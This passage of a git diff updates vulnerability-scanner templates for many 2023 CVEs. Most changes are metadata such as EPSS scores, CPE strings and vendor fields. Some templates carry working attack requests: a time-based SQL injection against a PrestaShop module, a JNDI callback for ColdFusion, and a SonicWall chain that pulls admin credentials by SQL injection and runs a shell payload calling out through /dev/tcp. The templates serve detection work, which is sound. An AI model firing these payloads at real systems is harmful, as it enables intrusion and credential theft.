CVE-2023-28432 cwe-id: CWE-200 - epss-score: 0.3955 + epss-score: 0.44017 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* + epss-percentile: 0.96884 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 63ca8a0e2d..19dc4fcd5c 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -6,15 +6,24 @@ info: severity: medium description: | The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user. - remediation: Fixed in version 2.2.2 reference: - https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036 - https://nvd.nist.gov/vuln/detail/CVE-2023-28665 + remediation: Fixed in version 2.2.2 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 cve-id: CVE-2023-28665 + cwe-id: CWE-79 + epss-score: 0.00082 + cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.338 metadata: max-request: 2 verified: true + framework: wordpress + vendor: technocrackers + product: bulk_price_update_for_woocommerce tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update http: @@ -25,7 +34,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin-ajax.php?action=techno_get_products&page= HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index c81dd3fc75..161680e92c 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.2 cve-id: CVE-2023-29084 cwe-id: CWE-77 - epss-score: 0.2422 + epss-score: 0.23785 cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* + epss-percentile: 0.95959 metadata: max-request: 3 vendor: zohocorp diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 7505d39605..1f8d4d8101 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -12,15 +12,18 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 - cwe-id: CWE-284 + cve-id: CVE-2023-29298 + cwe-id: CWE-284,NVD-CWE-Other + epss-score: 0.87627 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* + epss-percentile: 0.98219 metadata: max-request: 1 fofa-query: app="Adobe-ColdFusion" shodan-query: http.component:"Adobe ColdFusion" product: coldfusion vendor: adobe - tags: cve,cve2023,adobe,auth-bypass,coldfusion + tags: cve,cve2023,adobe,auth-bypass,coldfusion,kev http: - method: GET @@ -38,4 +41,4 @@ http: - contains(content_type, "text/html") - status_code == 200 - len(trim_space(body)) == 106 - condition: and \ No newline at end of file + condition: and diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index a3ecd810aa..5af3ff0324 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -12,8 +12,11 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2023-29300 cwe-id: CWE-502 + epss-score: 0.1414 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* + epss-percentile: 0.94979 metadata: max-request: 1 fofa-query: app="Adobe-ColdFusion" @@ -21,7 +24,6 @@ info: product: coldfusion vendor: adobe tags: cve,cve2023,adobe,rce,coldfusion,deserialization - variables: callback: "{{interactsh-url}}" jndi: "ldap%3a//{{callback}}/rcrzfd" diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index b254b54902..9d168eab70 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29489 cwe-id: CWE-79 - epss-score: 0.00203 + epss-score: 0.00276 cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* + epss-percentile: 0.64121 metadata: max-request: 1 shodan-query: title:"cPanel" diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index 4d871cb997..a703d9c426 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29622 cwe-id: CWE-89 - epss-score: 0.00827 + epss-score: 0.01215 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* + epss-percentile: 0.83553 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index 95a9621adb..2cd16128ba 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00102 cpe: cpe:2.3:a:purchase_order_management_project:purchase_order_management:1.0:*:*:*:*:*:*:* + epss-percentile: 0.40883 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index a19c7d1f72..e461608023 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2982 cwe-id: CWE-288 - epss-score: 0.01277 + epss-score: 0.01048 cpe: cpe:2.3:a:miniorange:wordpress_social_login_and_register_\(discord\,_google\,_twitter\,_linkedin\):*:*:*:*:*:wordpress:*:* + epss-percentile: 0.82159 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index 5239be1f29..a6063be2f4 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00439 cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:* + epss-percentile: 0.716 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index e8d289f6c9..625558392e 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.1 cve-id: CVE-2023-29919 cwe-id: CWE-276 - epss-score: 0.00909 + epss-score: 0.01214 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.83546 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index cf83f1b842..ea52b4692a 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5.3 cve-id: CVE-2023-29922 cwe-id: CWE-1188 - epss-score: 0.00606 + epss-score: 0.00538 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* + epss-percentile: 0.74271 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index d40dc7c4b6..9549b3f008 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-276 epss-score: 0.00802 cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:* + epss-percentile: 0.79495 metadata: fofa-query: app="PowerJob" max-request: 1 diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 7f0f1434d9..885d77ce37 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5.3 cve-id: CVE-2023-30019 cwe-id: CWE-918 - epss-score: 0.00379 + epss-score: 0.00336 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* + epss-percentile: 0.67605 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index b52e190848..8cc499d1ea 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -10,24 +10,29 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-30150 - https://security.friendsofpresta.org/module/2023/06/06/leocustomajax.html - https://www.tenable.com/cve/CVE-2023-30150 + - https://friends-of-presta.github.io/security-advisories/module/2023/06/06/leocustomajax.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-30150 cwe-id: CWE-89 + epss-score: 0.02253 + cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:* + epss-percentile: 0.88149 metadata: max-request: 2 shodan-query: http.component:"Prestashop" verified: true + framework: prestashop + vendor: leotheme + product: leocustomajax tags: cve,cve2023,prestashop,sqli http: - - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index 8ba011e5aa..5b70eb64fb 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* + epss-percentile: 0.29093 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index 61094fad73..d881012307 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.03155 cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:* + epss-percentile: 0.89844 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index 1472e075a7..5ffb40ab5b 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-30256 cwe-id: CWE-79 - epss-score: 0.01216 + epss-score: 0.01475 cpe: cpe:2.3:a:webkul:qloapps:1.5.2:*:*:*:*:*:*:* + epss-percentile: 0.85124 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index 3b554de12d..dfefa2a28b 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-79 epss-score: 0.00343 cpe: cpe:2.3:a:advancedcustomfields:advanced_custom_fields:*:*:*:*:-:wordpress:*:* + epss-percentile: 0.67945 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index 52d9387352..2530e3a8cf 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2023-31059 cwe-id: CWE-22 - epss-score: 0.00215 + epss-score: 0.00353 cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* + epss-percentile: 0.68399 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 24d4c71aa2..85b7d64ffb 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00078 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* + epss-percentile: 0.31901 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-32117.yaml b/http/cves/2023/CVE-2023-32117.yaml index ce2b09ada0..201af0e932 100644 --- a/http/cves/2023/CVE-2023-32117.yaml +++ b/http/cves/2023/CVE-2023-32117.yaml @@ -6,10 +6,10 @@ info: severity: high description: | The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more. - remediation: Fixed in 1.2.0 reference: - https://github.com/RandomRobbieBF/CVE-2023-32117 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/integrate-google-drive/integrate-google-drive-1199-missing-authorization-via-rest-api-endpoints + remediation: Fixed in 1.2.0 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 4016273318..5bc85ca637 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.00998 cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* + epss-percentile: 0.81698 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index 1fcab0e16d..cf73fcf335 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -11,15 +11,22 @@ info: - https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites?_s_id=cve - https://github.com/RandomRobbieBF/CVE-2023-32243/blob/main/exploit.py - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ + - https://patchstack.com/database/vulnerability/essential-addons-for-elementor-lite/wordpress-essential-addons-for-elementor-plugin-5-4-0-5-7-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-32243 cwe-id: CWE-287 + epss-score: 0.02722 + cpe: cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.89171 metadata: google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite max-request: 6 verified: true + framework: wordpress + vendor: wpdeveloper + product: essential_addons_for_elementor tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive http: @@ -27,23 +34,18 @@ http: - | GET /wp-login.php HTTP/1.1 Host: {{Hostname}} - - | GET /wp-json/wp/v2/users/ HTTP/1.1 Host: {{Hostname}} - - | GET /?rest_route=/wp/v2/users HTTP/1.1 Host: {{Hostname}} - - | GET /feed/ HTTP/1.1 Host: {{Hostname}} - - | GET /author-sitemap.xml HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/admin-ajax.php HTTP/2 Host: {{Hostname}} @@ -54,7 +56,6 @@ http: payloads: password: - "{{randstr}}" - host-redirects: true max-redirects: 2 stop-at-first-match: true diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 1f9a7e3ac6..e98d5ac47f 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -16,15 +16,16 @@ info: cvss-score: 7.5 cve-id: CVE-2023-32315 cwe-id: CWE-22 - epss-score: 0.17891 + epss-score: 0.96325 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* + epss-percentile: 0.99343 metadata: max-request: 1 verified: true shodan-query: title:"openfire" vendor: igniterealtime product: "openfire" - tags: cve,cve2023,auth-bypass,openfire,console + tags: cve,cve2023,auth-bypass,openfire,console,kev http: - raw: diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index a583170c8a..788ac9f65e 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-32563 cwe-id: CWE-22 + epss-score: 0.24808 cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:* - epss-score: 0.01048 + epss-percentile: 0.96032 metadata: max-request: 2 product: avalanche @@ -42,7 +43,6 @@ http: out.println("CVE-2023-32563"); %> --------------------------eacf31f23ac1829f-- - - | GET /{{randstr}}.jsp HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 799f4fea50..1ecbb6f6aa 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33338 cwe-id: CWE-89 - epss-score: 0.00546 + epss-score: 0.00732 cpe: cpe:2.3:a:old_age_home_management_system_project:old_age_home_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.78382 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index ea254b1643..72458b41fe 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33439 cwe-id: CWE-89 - epss-score: 0.00412 + epss-score: 0.00389 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.69875 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index a0324232cd..26bfa310ef 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33440 cwe-id: CWE-434 - epss-score: 0.03585 + epss-score: 0.03396 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.90194 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index cd87e7738c..0dc11c3f41 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -14,9 +14,17 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 + cve-id: CVE-2023-3345 + cwe-id: CWE-200 + epss-score: 0.00599 + cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.75693 metadata: max-request: 3 verified: true + framework: wordpress + vendor: masteriyo + product: masteriyo tags: wp-plugin,xss,wp,wordpress,exposure,authenticated,learning-management-system,wpscan http: @@ -28,17 +36,16 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/profile.php HTTP/1.1 Host: {{Hostname}} - - | GET /wp-json/masteriyo/v1/users/ HTTP/1.1 Host: {{Hostname}} X-WP-Nonce: {{nonce}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index 610c6a9c6a..231ec20029 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2023-33510 cwe-id: CWE-668 - epss-score: 0.00291 + epss-score: 0.00347 cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:* + epss-percentile: 0.68111 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index 7adb1a4be0..d677ce46c4 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-552 epss-score: 0.35763 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:* + epss-percentile: 0.96601 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index 45e6406879..b1065f203b 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -13,16 +13,20 @@ info: - https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb - https://nvd.nist.gov/vuln/detail/CVE-2023-34124 classification: - cve-id: CVE-2023-34124 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cwe-id: CWE-287 + cve-id: CVE-2023-34124 + cwe-id: CWE-287,CWE-305 + epss-score: 0.01154 + cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:* + epss-percentile: 0.83049 metadata: max-request: 4 verified: true shodan-query: http.favicon.hash:-1381126564 + vendor: sonicwall + product: analytics tags: cve,cve2023,sonicwall,shell,injection,auth-bypass,instrusive - variables: callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80" query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '" @@ -36,18 +40,15 @@ http: GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1 Host: {{Hostname}} Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"} - - | GET /appliance/login HTTP/1.1 Host: {{Hostname}} - - | POST /appliance/applianceMainPage HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,"^.*:",""))) }}&password={{replace_regex(alias,"^.*:","")}}&applianceUser={{replace_regex(alias,":.*$","")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0 - - | POST /appliance/applianceMainPage HTTP/1.1 Host: {{Hostname}} @@ -56,6 +57,7 @@ http: num=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\$\(echo\+-e\+begin-base64\+755\+a\\\\nKwee\\\\n\%3d\%3d\%3d\%3d\+\|\+uudecode\+-o-\)\%3becho\+-e\+begin-base64\+755\+/tmp/.{{filename}}\\\\n{{replace(base64(callback),"+","${PLUS}")}}\\\\n\%3d\%3d\%3d\%3d\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+ cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index d7dce8b9b4..7de45b24d1 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -10,13 +10,16 @@ info: - https://github.com/horizon3ai/CVE-2023-34362 - https://www.horizon3.ai/moveit-transfer-cve-2023-34362-deep-dive-and-indicators-of-compromise/ - https://nvd.nist.gov/vuln/detail/CVE-2023-34362 + - http://packetstormsecurity.com/files/172883/MOVEit-Transfer-SQL-Injection-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/173110/MOVEit-SQL-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34362 cwe-id: CWE-89 - epss-score: 0.94054 + epss-score: 0.93679 cpe: cpe:2.3:a:progress:moveit_cloud:*:*:*:*:*:*:*:* + epss-percentile: 0.9877 metadata: max-request: 7 shodan-query: http.favicon.hash:989289239 diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index 380f8c0cbc..07c5cbe0b1 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.0007 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* + epss-percentile: 0.28777 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index de8d81734d..c78a2aa550 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.03671 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* + epss-percentile: 0.9052 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index 8183c1f97b..1147f89a77 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-34599 cwe-id: CWE-79 - epss-score: 0.00089 + epss-score: 0.00107 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* + epss-percentile: 0.42545 metadata: max-request: 2 shodan-query: http.favicon.hash:-165631681 diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index 34cfed3714..112d0a23d6 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3460 cwe-id: CWE-269 - epss-score: 0.00268 + epss-score: 0.1492 cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.95093 metadata: max-request: 4 verified: true @@ -28,7 +29,6 @@ info: product: ultimate_member framework: wordpress tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,kev,wpscan - variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 58b92ac6ed..2a0490478e 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34659 cwe-id: CWE-89 - epss-score: 0.04584 + epss-score: 0.04804 cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:* + epss-percentile: 0.91686 metadata: max-request: 1 shodan-query: http.favicon.hash:1380908726 diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 10e6b97a9e..1f2dd55aea 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3479 cwe-id: CWE-79 - epss-score: 0.00065 + epss-score: 0.00077 cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* + epss-percentile: 0.3156 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 326d26dd63..74163e0926 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-22 epss-score: 0.00297 cpe: cpe:2.3:a:traggo:traggo:0.3.0:*:*:*:*:*:*:* + epss-percentile: 0.65501 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index 